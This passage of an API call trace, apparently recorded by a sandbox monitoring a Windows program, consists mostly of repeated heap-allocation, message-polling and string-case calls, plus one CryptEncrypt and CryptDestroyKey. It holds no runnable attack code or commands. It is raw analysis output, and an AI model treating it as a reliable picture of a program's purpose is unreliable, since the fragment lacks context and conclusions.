(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0188.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0188.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0188.767] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.767] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.768] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0188.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0188.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0188.768] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0188.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0188.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0188.768] CryptEncrypt (in: hKey=0xaa58a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24e8210*, pdwDataLen=0x8bef68*=0xad35, dwBufLen=0xad38 | out: pbData=0x24e8210*, pdwDataLen=0x8bef68*=0xad38) returned 1 [0188.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0188.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0188.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0188.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0188.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0188.769] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0188.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0188.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0188.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0188.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.770] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.770] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0188.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.770] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0188.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0188.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0188.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0188.770] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.770] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0188.771] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0188.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0188.771] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0188.771] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0188.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0188.771] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0188.771] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.771] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0188.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0188.771] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0188.771] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0188.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.772] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0188.772] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.772] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0188.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.772] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.772] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0188.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0188.772] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.772] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0188.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0188.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.773] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.773] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.773] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0188.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0188.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.773] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.773] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.773] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0188.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0188.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.776] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.777] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.777] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0188.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.779] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0188.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0188.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.779] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0188.779] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0188.779] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0188.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.780] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0188.780] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.780] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0188.780] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.780] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0188.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0188.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.780] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.780] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0188.780] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0188.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0188.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.781] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0188.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0188.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0188.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.781] CryptDestroyKey (hKey=0xaa58a0) returned 1 [0188.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0188.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0188.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0188.782] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0188.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0188.782] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0188.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0188.782] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0188.782] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0188.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0188.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.782] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0188.782] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.782] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0188.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0188.783] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0188.783] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0188.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0188.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0188.783] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0188.783] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0188.783] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0188.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0188.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0188.783] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0188.783] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.783] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.784] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0188.784] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.785] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0188.785] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0188.785] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) 